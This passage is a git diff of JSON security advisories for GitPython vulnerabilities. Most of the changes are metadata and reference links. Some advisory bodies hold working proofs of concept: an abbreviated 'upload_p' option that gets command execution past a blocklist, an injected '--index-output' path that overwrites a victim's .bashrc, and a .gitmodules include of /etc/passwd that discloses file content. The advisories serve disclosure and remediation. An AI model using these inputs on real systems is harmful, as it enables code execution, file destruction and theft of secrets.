|\n\n### Bypass keys (verified)\n\n| kwarg key | git resolves to | path | weaponizable |\n|---|---|---|---|\n| `upload_p`, `upload_pac` | `--upload-pack` | clone / fetch / pull | Yes — direct RCE |\n| `receive_p` | `--receive-pack` | push | Yes — direct RCE |\n| `exe` | `--exec` | push | Yes — direct RCE |\n| `conf`, `confi` | `--config` | clone | bypasses option blocklist; RCE needs an additional config vector (see note) |\n\n### Minimal PoC\n\nSelf-contained, no network egress (a local bare repo acts as the \"remote\"). Tested on current `main` (git 2.50.1):\n\n```python\nimport os, stat, tempfile\nfrom git import Repo\n\nwork = tempfile.mkdtemp()\nmarker = os.path.join(work, \"RCE_MARKER\")\n\n# fake \"upload-pack\" program that proves arbitrary command execution\nprog = os.path.join(work, \"evil.sh\")\nwith open(prog, \"w\") as f:\n f.write(f\"#!/bin/sh\\ntouch {marker}\\nexit 1\\n\") # exit 1 so git aborts after our code ran\nos.chmod(prog, os.stat(prog).st_mode | stat.S_IEXEC)\n\nbare = os.path.join(work, \"remote.git\")\nRepo.init(bare, bare=True)\n\n# attacker-controlled kwarg KEY 'upload_p' -> --upload-p= -> git runs \ntry:\n Repo.clone_from(bare, os.path.join(work, \"out\"), upload_p=prog)\nexcept Exception:\n pass # git aborts with GitCommandError AFTER the payload executed\n\nprint(\"RCE marker created:\", os.path.exists(marker)) # True -> command injection confirmed\n```\n\nEquivalent at the shell: `git clone --upload-p=/tmp/evil.sh src out` runs `evil.sh`.\n\nConfirmed behavior:\n- `upload_pack` (exact) → blocked; `upload_p` (abbrev) → passes guard, reaches git, executes. The fix works for the form it models but not the abbreviated form.\n- `allow_unsafe_options=True` opt-out behaves as documented (out of scope).\n\n### Honest scope note\n\nLike the parent CVE, exploitation requires a host application that flows attacker-controlled kwarg **keys** into a GitPython clone/fetch/pull/push. Where the host passes only fixed/validated keys, this is not reachable — the vulnerability is in the library's documented defense-in-depth control (`allow_unsafe_options=False`), which this variant defeats.\n\nOn the `--config` family: `conf` bypasses the option blocklist, but weaponizing `--config protocol.ext.allow=always` via an `ext::` URL is independently blocked by GitPython's protocol allowlist (`allow_unsafe_protocols=False`). The directly weaponizable family is `upload-pack` / `receive-pack` / `exec`. Reported transparently — not claiming Critical.\n\n### Suggested remediation (any one)\n\n1. **Prefix-aware matching:** reject any option whose canonical name is an unambiguous prefix of a blocked option (≈ `startswith` on the blocked canonical name, after `dashify`).\n2. **Disable abbreviation at the sink:** pass `--end-of-options` or invoke git in a way that disables long-option abbreviation.\n3. **Allowlist** option names on security-sensitive subcommands instead of a blocklist.\n\nRemediation should also cover the `-c`/`--config` family abbreviations, even though the `ext::` route is currently gated by the protocol allowlist.", + "details": "## Command injection via long-option prefix abbreviation bypassing `check_unsafe_options` (incomplete fix of CVE-2026-42215 / GHSA-rpm5-65cw-6hj4)\n\n**Component:** gitpython-developers/GitPython (PyPI: GitPython)\n**Affected:** all versions carrying the 3.1.47 blocklist fix, through current `main` (verified at commit `20c5e275`, `3.1.50-42`)\n**Reporter:** hackkim\n\n### Summary\n\nThe 3.1.47 fix for CVE-2026-42215 blocks dangerous git options (`--upload-pack`, `--config`, `-c`, `-u` for clone; `--upload-pack` for fetch/pull; `--receive-pack`, `--exec` for push) so callers cannot reach command-executing options unless they pass `allow_unsafe_options=True`.\n\nThe fix canonicalizes an option name along **one** axis (underscore→hyphen via `dashify`) and checks it against an **exact-match** dict. It does not account for git's unambiguous long-option prefix abbreviation. Git accepts any unambiguous prefix of a long option (`--upload-p`, `--upload-pa`, `--upload-pac` all resolve to `--upload-pack`). So a kwarg key like `upload_p` canonicalizes to `upload-p`, misses the blocklist dict, and is emitted to git as `--upload-p=` → executed as `--upload-pack=` → command injection, in the default `allow_unsafe_options=False` configuration.\n\n### The asymmetry (root cause)\n\n```python\n# git/cmd.py (commit 20c5e275), lines 948-974\n@classmethod\ndef _canonicalize_option_name(cls, option):\n option_name = option.lstrip(\"-\").split(\"=\", 1)[0]\n option_tokens = option_name.split(None, 1)\n if not option_tokens:\n return \"\"\n return dashify(option_tokens[0]) # only transform: \"_\" -> \"-\"\n\n@classmethod\ndef check_unsafe_options(cls, options, unsafe_options):\n canonical_unsafe_options = {cls._canonicalize_option_name(o): o for o in unsafe_options}\n for option in options:\n unsafe_option = canonical_unsafe_options.get(cls._canonicalize_option_name(option))\n if unsafe_option is not None:\n raise UnsafeOptionError(...)\n```\n\nThe guard normalizes only `_`→`-` and does exact dict membership. Git's CLI parser accepts a broader grammar (prefix abbreviation) than the guard models, so abbreviated keys slip through and reach git as the blocked option.\n\n### Affected code (commit `20c5e275`)\n\n| Location | Role |\n|---|---|\n| `git/cmd.py:948-960` `_canonicalize_option_name` | canonicalizer — no prefix expansion |\n| `git/cmd.py:963-974` `check_unsafe_options` | exact-match dict lookup (the incomplete guard) |\n| `git/cmd.py:1511` `transform_kwarg` | emits `--=` to the CLI |\n| `git/repo/base.py:1411,1413` | clone call sites |\n| `git/remote.py:1074,1128,1201` | fetch / pull / push call sites |\n\n### Bypass keys (verified)\n\n| kwarg key | git resolves to | path | weaponizable |\n|---|---|---|---|\n| `upload_p`, `upload_pac` | `--upload-pack` | clone / fetch / pull | Yes — direct RCE |\n| `receive_p` | `--receive-pack` | push | Yes — direct RCE |\n| `exe` | `--exec` | push | Yes — direct RCE |\n| `conf`, `confi` | `--config` | clone | bypasses option blocklist; RCE needs an additional config vector (see note) |\n\n### Minimal PoC\n\nSelf-contained, no network egress (a local bare repo acts as the \"remote\"). Tested on current `main` (git 2.50.1):\n\n```python\nimport os, stat, tempfile\nfrom git import Repo\n\nwork = tempfile.mkdtemp()\nmarker = os.path.join(work, \"RCE_MARKER\")\n\n# fake \"upload-pack\" program that proves arbitrary command execution\nprog = os.path.join(work, \"evil.sh\")\nwith open(prog, \"w\") as f:\n f.write(f\"#!/bin/sh\\ntouch {marker}\\nexit 1\\n\") # exit 1 so git aborts after our code ran\nos.chmod(prog, os.stat(prog).st_mode | stat.S_IEXEC)\n\nbare = os.path.join(work, \"remote.git\")\nRepo.init(bare, bare=True)\n\n# attacker-controlled kwarg KEY 'upload_p' -> --upload-p= -> git runs \ntry:\n Repo.clone_from(bare, os.path.join(work, \"out\"), upload_p=prog)\nexcept Exception:\n pass # git aborts with GitCommandError AFTER the payload executed\n\nprint(\"RCE marker created:\", os.path.exists(marker)) # True -> command injection confirmed\n```\n\nEquivalent at the shell: `git clone --upload-p=/tmp/evil.sh src out` runs `evil.sh`.\n\nConfirmed behavior:\n- `upload_pack` (exact) → blocked; `upload_p` (abbrev) → passes guard, reaches git, executes. The fix works for the form it models but not the abbreviated form.\n- `allow_unsafe_options=True` opt-out behaves as documented (out of scope).\n\n### Honest scope note\n\nLike the parent CVE, exploitation requires a host application that flows attacker-controlled kwarg **keys** into a GitPython clone/fetch/pull/push. Where the host passes only fixed/validated keys, this is not reachable — the vulnerability is in the library's documented defense-in-depth control (`allow_unsafe_options=False`), which this variant defeats.\n\nOn the `--config` family: `conf` bypasses the option blocklist, but weaponizing `--config protocol.ext.allow=always` via an `ext::` URL is independently blocked by GitPython's protocol allowlist (`allow_unsafe_protocols=False`). The directly weaponizable family is `upload-pack` / `receive-pack` / `exec`. Reported transparently — not claiming Critical.\n\n### Suggested remediation (any one)\n\n1. **Prefix-aware matching:** reject any option whose canonical name is an unambiguous prefix of a blocked option (≈ `startswith` on the blocked canonical name, after `dashify`).\n2. **Disable abbreviation at the sink:** pass `--end-of-options` or invoke git in a way that disables long-option abbreviation.\n3. **Allowlist** option names on security-sensitive subcommands instead of a blocklist.\n\nRemediation should also cover the `-c`/`--config` family abbreviations, even though the `ext::` route is currently gated by the protocol allowlist.", "severity": [ { "type": "CVSS_V3", @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-2f96-g7mh-g2hx" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67325" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2161" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.51" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-command-injection-via-option-prefix-abbreviation" } ] } diff --git a/advisories/BREW-tartufo-CVE-2026-73619.json b/advisories/BREW-tartufo-CVE-2026-73619.json index 6435a4e0239..e8f91ee8af2 100644 --- a/advisories/BREW-tartufo-CVE-2026-73619.json +++ b/advisories/BREW-tartufo-CVE-2026-73619.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-73619", "published": "2026-08-14T09:45:06Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-539m-9xh6-q6rr", - "CVE-2026-73619" + "CVE-2026-73619", + "PYSEC-2026-3948" ], "affected": [ { diff --git a/advisories/BREW-tartufo-CVE-2026-73620.json b/advisories/BREW-tartufo-CVE-2026-73620.json index 182d07fbef3..9b285efb6b9 100644 --- a/advisories/BREW-tartufo-CVE-2026-73620.json +++ b/advisories/BREW-tartufo-CVE-2026-73620.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-73620", "published": "2026-08-14T09:45:06Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:07:24Z", "upstream": [ "GHSA-3f7w-8rr8-f37f", - "CVE-2026-73620" + "CVE-2026-73620", + "PYSEC-2026-3949" ], "affected": [ { diff --git a/advisories/BREW-tartufo-CVE-2026-73621.json b/advisories/BREW-tartufo-CVE-2026-73621.json index c9d2f239e85..767069f3ede 100644 --- a/advisories/BREW-tartufo-CVE-2026-73621.json +++ b/advisories/BREW-tartufo-CVE-2026-73621.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-73621", "published": "2026-08-14T09:45:06Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-p538-c434-8v24", - "CVE-2026-73621" + "CVE-2026-73621", + "PYSEC-2026-3950" ], "affected": [ { diff --git a/advisories/BREW-tartufo-CVE-2026-73622.json b/advisories/BREW-tartufo-CVE-2026-73622.json index a0c474cfa61..23a456b1cbb 100644 --- a/advisories/BREW-tartufo-CVE-2026-73622.json +++ b/advisories/BREW-tartufo-CVE-2026-73622.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-73622", "published": "2026-08-14T09:45:06Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-94p4-4cq8-9g67", - "CVE-2026-73622" + "CVE-2026-73622", + "PYSEC-2026-3951" ], "affected": [ { diff --git a/advisories/BREW-tartufo-CVE-2026-73623.json b/advisories/BREW-tartufo-CVE-2026-73623.json index bc4c14452f8..6dc8e769d8d 100644 --- a/advisories/BREW-tartufo-CVE-2026-73623.json +++ b/advisories/BREW-tartufo-CVE-2026-73623.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-73623", "published": "2026-08-14T09:45:06Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-6p8h-3wgx-97gf", - "CVE-2026-73623" + "CVE-2026-73623", + "PYSEC-2026-3952" ], "affected": [ { diff --git a/advisories/BREW-tartufo-CVE-2026-73625.json b/advisories/BREW-tartufo-CVE-2026-73625.json index 9a841de1954..8b4018c6f61 100644 --- a/advisories/BREW-tartufo-CVE-2026-73625.json +++ b/advisories/BREW-tartufo-CVE-2026-73625.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-73625", "published": "2026-08-14T09:45:06Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-r9mr-m37c-5fr3", - "CVE-2026-73625" + "CVE-2026-73625", + "PYSEC-2026-3953" ], "affected": [ { diff --git a/advisories/BREW-tartufo-CVE-2026-76217.json b/advisories/BREW-tartufo-CVE-2026-76217.json index 8f3fc6d89df..ff4be931bb7 100644 --- a/advisories/BREW-tartufo-CVE-2026-76217.json +++ b/advisories/BREW-tartufo-CVE-2026-76217.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-76217", "published": "2026-08-20T09:45:22Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-hh9p-6wh2-4mfc", - "CVE-2026-76217" + "CVE-2026-76217", + "PYSEC-2026-3841" ], "affected": [ { @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-hh9p-6wh2-4mfc" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76217" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-pathspec-from-file" } ] } diff --git a/advisories/BREW-tartufo-CVE-2026-76218.json b/advisories/BREW-tartufo-CVE-2026-76218.json index d1260df875e..9ae62fbf55b 100644 --- a/advisories/BREW-tartufo-CVE-2026-76218.json +++ b/advisories/BREW-tartufo-CVE-2026-76218.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-76218", "published": "2026-08-20T09:45:22Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-9rj7-rf2p-w77r", - "CVE-2026-76218" + "CVE-2026-76218", + "PYSEC-2026-3840" ], "affected": [ { @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-9rj7-rf2p-w77r" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76218" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-remote-code-execution-via-repo-init" } ] } diff --git a/advisories/BREW-tartufo-CVE-2026-76219.json b/advisories/BREW-tartufo-CVE-2026-76219.json index 5e0812ff477..cf20bab7047 100644 --- a/advisories/BREW-tartufo-CVE-2026-76219.json +++ b/advisories/BREW-tartufo-CVE-2026-76219.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-76219", "published": "2026-08-20T09:45:22Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-4gmw-gg2m-w46p", - "CVE-2026-76219" + "CVE-2026-76219", + "PYSEC-2026-3838" ], "affected": [ { @@ -52,7 +53,7 @@ ] }, "summary": "GitPython: Unguarded git read-tree option forwarding in IndexFile.from_tree/reset/merge_tree enables arbitrary file overwrite", - "details": "## Summary\n`IndexFile.from_tree`, `IndexFile.reset` (→ from_tree) and `IndexFile.merge_tree` append caller-influenced treeish strings positionally to `git read-tree` with no unsafe-option guard, no `allow_unsafe_options` parameter, and no `--` separator. `git read-tree --index-output=` writes the resulting index to an arbitrary path, and last-occurrence-wins lets an injected `--index-output` override the method's internal temp path — clobbering an arbitrary file with a valid git-index blob. This is a distinct, never-guarded sink: commit `3af0c251` (GHSA-3f7w-8rr8-f37f) guarded only `checkout_index` and `tag`; `read_tree` was left unprotected (it is among the acknowledged unguarded call sites in that advisory's sweep but was never reported or fixed).\n\n## Root Cause\n`from_tree` (index/base.py:388), `reset` (delegates to from_tree), and `merge_tree` (index/base.py:291) call `repo.git.read_tree(*arg_list)` with no `check_unsafe_options` and no `--`. The treeish is caller-influenced and positional.\n\n## Impact\nArbitrary file overwrite / destruction at the privileges of the host process. Content is constrained to a git-index blob (not attacker-chosen, so not RCE), but the target path is fully attacker-controlled — corrupting/truncating configs or destroying files at attacker-chosen writable locations = I:H + A:H (per the skill's \"overwrite-any-path = I:H\" rule). Pure VALUE control (positional treeish). Default configuration.\n\n## Proof of Concept\n```python\nIndexFile.from_tree(repo, \"--index-output=/home/victim/.bashrc\")\n# target overwritten with a valid git-index blob (DIRC...)\n```\n\n## Attack Chain\n1. Entry: app calls `IndexFile.from_tree(repo, treeish)` / `reset(commit=…)` / `merge_tree(base=…, rhs=…)` with attacker `treeish=\"--index-output=/home/victim/.bashrc\"`.\n2. Check: NONE — the methods have no `allow_unsafe_options` and never call `check_unsafe_options`.\n3. Sink: `repo.git.read_tree(*arg_list)` — no `--`. argv (from_tree, observed): `['git','read-tree','--index-output=','--index-output=/…/victim']` (last-wins).\n4. Impact: target path created/overwritten with a valid git-index blob; existing content destroyed.\n\n## Bypass Evidence\nIndependently reproduced (gate harness): `IndexFile.from_tree(repo,'--index-output=')` → victim overwritten; before=`IMPORTANT ORIGINAL CONTENT`, after starts `DIRC\\x00\\x00\\x00\\x02…` (destructive clobber, valid index blob). `reset(commit=…)` and both `merge_tree` positionals verified. Fix-commit read: `3af0c251` touched only `checkout_index`+`tag`; `read_tree` untouched on HEAD.\n\n## Affected Versions\n`GitPython <= 3.1.57` (sinks present verbatim on the latest release tag).\n\n## Suggested Fix\nAdd a `check_unsafe_options` guard (with an `allow_unsafe_options` parameter) to `from_tree`/`reset`/`merge_tree`, and/or place a `--` separator before the positional treeish arguments; block `--index-output` (a path-taking option) on this sink.\n\n---\nReported by **zx (Jace)** — GitHub: @manus-use", + "details": "## Summary\n`IndexFile.from_tree`, `IndexFile.reset` (→ from_tree) and `IndexFile.merge_tree` append caller-influenced treeish strings positionally to `git read-tree` with no unsafe-option guard, no `allow_unsafe_options` parameter, and no `--` separator. `git read-tree --index-output=` writes the resulting index to an arbitrary path, and last-occurrence-wins lets an injected `--index-output` override the method's internal temp path — clobbering an arbitrary file with a valid git-index blob. This is a distinct, never-guarded sink: commit `3af0c251` (GHSA-3f7w-8rr8-f37f) guarded only `checkout_index` and `tag`; `read_tree` was left unprotected (it is among the acknowledged unguarded call sites in that advisory's sweep but was never reported or fixed).\n\n## Root Cause\n`from_tree` (index/base.py:388), `reset` (delegates to from_tree), and `merge_tree` (index/base.py:291) call `repo.git.read_tree(*arg_list)` with no `check_unsafe_options` and no `--`. The treeish is caller-influenced and positional.\n\n## Impact\nArbitrary file overwrite / destruction at the privileges of the host process. Content is constrained to a git-index blob (not attacker-chosen, so not RCE), but the target path is fully attacker-controlled — corrupting/truncating configs or destroying files at attacker-chosen writable locations = I:H + A:H (per the skill's \"overwrite-any-path = I:H\" rule). Pure VALUE control (positional treeish). Default configuration.\n\n## Proof of Concept\n```python\nIndexFile.from_tree(repo, \"--index-output=/home/victim/.bashrc\")\n# target overwritten with a valid git-index blob (DIRC...)\n```\n\n## Attack Chain\n1. Entry: app calls `IndexFile.from_tree(repo, treeish)` / `reset(commit=…)` / `merge_tree(base=…, rhs=…)` with attacker `treeish=\"--index-output=/home/victim/.bashrc\"`.\n2. Check: NONE — the methods have no `allow_unsafe_options` and never call `check_unsafe_options`.\n3. Sink: `repo.git.read_tree(*arg_list)` — no `--`. argv (from_tree, observed): `['git','read-tree','--index-output=','--index-output=/…/victim']` (last-wins).\n4. Impact: target path created/overwritten with a valid git-index blob; existing content destroyed.\n\n## Bypass Evidence\nIndependently reproduced (gate harness): `IndexFile.from_tree(repo,'--index-output=')` → victim overwritten; before=`IMPORTANT ORIGINAL CONTENT`, after starts `DIRC\\x00\\x00\\x00\\x02…` (destructive clobber, valid index blob). `reset(commit=…)` and both `merge_tree` positionals verified. Fix-commit read: `3af0c251` touched only `checkout_index`+`tag`; `read_tree` untouched on HEAD.\n\n## Affected Versions\n`GitPython <= 3.1.57` (sinks present verbatim on the latest release tag).\n\n## Suggested Fix\nAdd a `check_unsafe_options` guard (with an `allow_unsafe_options` parameter) to `from_tree`/`reset`/`merge_tree`, and/or place a `--` separator before the positional treeish arguments; block `--index-output` (a path-taking option) on this sink.", "severity": [ { "type": "CVSS_V3", @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-4gmw-gg2m-w46p" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76219" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-overwrite-via-read-tree" } ] } diff --git a/advisories/BREW-tartufo-CVE-2026-76220.json b/advisories/BREW-tartufo-CVE-2026-76220.json index 399c29bd07f..2cedc7937c5 100644 --- a/advisories/BREW-tartufo-CVE-2026-76220.json +++ b/advisories/BREW-tartufo-CVE-2026-76220.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-76220", "published": "2026-08-20T09:45:22Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-wvpp-8hx9-p66j", - "CVE-2026-76220" + "CVE-2026-76220", + "PYSEC-2026-3843" ], "affected": [ { @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-wvpp-8hx9-p66j" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76220" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-command-execution-via-split-single-char-options" } ] } diff --git a/advisories/BREW-tartufo-CVE-2026-76221.json b/advisories/BREW-tartufo-CVE-2026-76221.json index 79d72883097..8c3d60afa63 100644 --- a/advisories/BREW-tartufo-CVE-2026-76221.json +++ b/advisories/BREW-tartufo-CVE-2026-76221.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-76221", "published": "2026-08-20T09:45:22Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-jm78-9fvv-mhgr", "CVE-2026-76221", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-tartufo-CVE-2026-76222.json b/advisories/BREW-tartufo-CVE-2026-76222.json index a9cb65be4ad..98303ffae90 100644 --- a/advisories/BREW-tartufo-CVE-2026-76222.json +++ b/advisories/BREW-tartufo-CVE-2026-76222.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-76222", "published": "2026-08-20T09:45:22Z", - "modified": "2026-09-05T10:14:54Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "GHSA-hmq2-w58f-27jc", "CVE-2026-76222", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", @@ -73,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-hmq2-w58f-27jc" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76222" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2202" @@ -92,6 +88,14 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3784.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-path-traversal-via-gitmodules-submodule-name" } ] } diff --git a/advisories/BREW-tartufo-CVE-2026-78675.json b/advisories/BREW-tartufo-CVE-2026-78675.json index 777836c4c58..3d793c97416 100644 --- a/advisories/BREW-tartufo-CVE-2026-78675.json +++ b/advisories/BREW-tartufo-CVE-2026-78675.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-78675", "published": "2026-09-04T10:12:20Z", - "modified": "2026-09-05T10:16:40Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "PYSEC-2026-3785", "CVE-2026-78675", @@ -52,21 +52,50 @@ } ] }, - "details": "GitPython before 3.1.59 fails to disable merge_includes when parsing .gitmodules, allowing attackers to disclose local file content by including arbitrary file paths via [include] directives. Attackers can craft a malicious .gitmodules file with include directives pointing to sensitive files; when repo.submodules is accessed, GitConfigParser raises MissingSectionHeaderError embedding the target file's first line verbatim in the exception message.", + "summary": "GitPython: Arbitrary local file content disclosure via [include] directive in untrusted .gitmodules (SubmoduleConfigParser never disables merge_includes)", + "details": "# [HIGH] Arbitrary local file content disclosure via `[include]` directive in untrusted `.gitmodules` (`SubmoduleConfigParser` never disables `merge_includes`)\n\n- **CWE:** CWE-200 (Exposure of Sensitive Information) / CWE-73 (External Control of File Name or Path)\n- **Affected component:** `git/objects/submodule/base.py`, `Submodule._config_parser()` (~line 273) constructing `SubmoduleConfigParser(fp_module, read_only=read_only)`; `git/config.py`, `GitConfigParser.__init__` (`merge_includes` default), `GitConfigParser.read()`/`_included_paths()` (include-path resolution, ~lines 630-685), `GitConfigParser._read()` (~line 493-498, `MissingSectionHeaderError`)\n- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)\n\n## Reachability\n`GitConfigParser.__init__` defaults `merge_includes=True`: any config file it parses has its `[include]` (and, when a `repo=` is supplied, `[includeIf ...]`) directives followed and merged in. The maintainers already recognized this as dangerous for one specific case and fixed it in commit `41ecc6a4` (\"Disable merge_includes in config writers\"), which passes `merge_includes=False` when `Repo.config_writer()` builds its parser (`git/repo/base.py`).\n\nThat fix never touched `Submodule._config_parser()`. This method builds the parser used for **every** read of a repo's submodule configuration — `repo.submodules`, `Submodule.iter_items()`, `Submodule.config()` — via `SubmoduleConfigParser(fp_module, read_only=read_only)`, passing neither `merge_includes=False` nor `repo=`. The `True` class default is therefore inherited unchanged, and `fp_module` here is `.gitmodules` — **the single most attacker-controlled config file in the entire codebase**, since it ships verbatim as tracked content inside any cloned repository.\n\n`GitConfigParser.read()`'s include-path resolution (~line 662-680) performs no containment check: `osp.isabs(include_path)` short-circuits the path join entirely for an absolute path, and a relative path is joined with `osp.join(osp.dirname(file_path), include_path)` / `osp.normpath()`'d with no check that the result stays under the repository. `~` is expanded via `osp.expanduser`. The only gate before opening is `os.access(include_path, os.R_OK)` — a readability check, not a path restriction.\n\nOnce opened, `GitConfigParser._read()` parses the target file as git-config INI. If the first non-blank/non-comment line is not a `[section]` header — true of virtually any non-gitconfig file (source code, `/etc/passwd`, `.env` files, credential files, logs, JSON/YAML) — it raises `configparser.MissingSectionHeaderError(fpname, lineno, line)`. Python's stdlib formats this exception's `str()` as `\"File contains no section headers.\\nfile: %r, line: %d\\n%r\" % (fpname, lineno, line)` — it embeds the **verbatim content** of that file's first line in the exception message. `Submodule.iter_items()` catches only `(IOError, BadName)`, not `configparser.Error`, so this exception propagates straight out of the ordinary, read-only `repo.submodules` call.\n\n## Root cause\nParity gap between two config-parser construction sites for the exact same footgun: `Repo.config_writer()` was hardened against `merge_includes` in 2023 (`41ecc6a4`); `Submodule._config_parser()` — which parses `.gitmodules`, content that is *always* attacker-controlled the moment a repository is cloned from an untrusted source — was never given the same treatment. (The submodule *write*-mode config parser at `git/objects/submodule/base.py` for `.git/modules//config` — a different, locally-generated file — has correctly passed `merge_includes=False` since 2022, underscoring that the omission for `.gitmodules` reads looks like an oversight rather than a considered exception.)\n\n## Exploit path\n1. Attacker crafts a repository whose `.gitmodules` contains a legitimate-looking `[submodule ...]` section plus:\n ```\n [include]\n \tpath = /etc/passwd\n ```\n (an absolute path bypasses any traversal reasoning entirely; a relative `../../../../etc/passwd`-style path works too).\n2. Victim performs the extremely common, entirely read-only operation of enumerating a cloned repo's submodules: `list(repo.submodules)` (or any `for sm in repo.submodules`) — no `update()`, `init()`, or checkout of any kind required.\n3. `SubmoduleConfigParser` (inheriting `merge_includes=True`) follows the `[include]` directive, opens `/etc/passwd`, and `GitConfigParser._read()` raises `MissingSectionHeaderError` whose message embeds `/etc/passwd`'s first line verbatim.\n4. This exception surfaces wherever the host application observes exceptions from GitPython — CI logs, error pages, exception trackers, or any dependency-scanner/code-review-bot/hosting-platform tool built on `repo.submodules` — disclosing the targeted file's first line to the attacker (directly, or indirectly via any channel that echoes the error).\n\n## Impact\nNon-blind local file content disclosure (first line) of any file readable by the victim process, triggered purely by attacker-controlled repository content and one routine, read-only GitPython call. Bounded to one line per triggering file (parsing aborts at the first `MissingSectionHeaderError`), but that line very often *is* the secret — `.env` files (`DATABASE_URL=...`, `API_KEY=...`), single-line credential/token files, `/etc/passwd`'s root entry 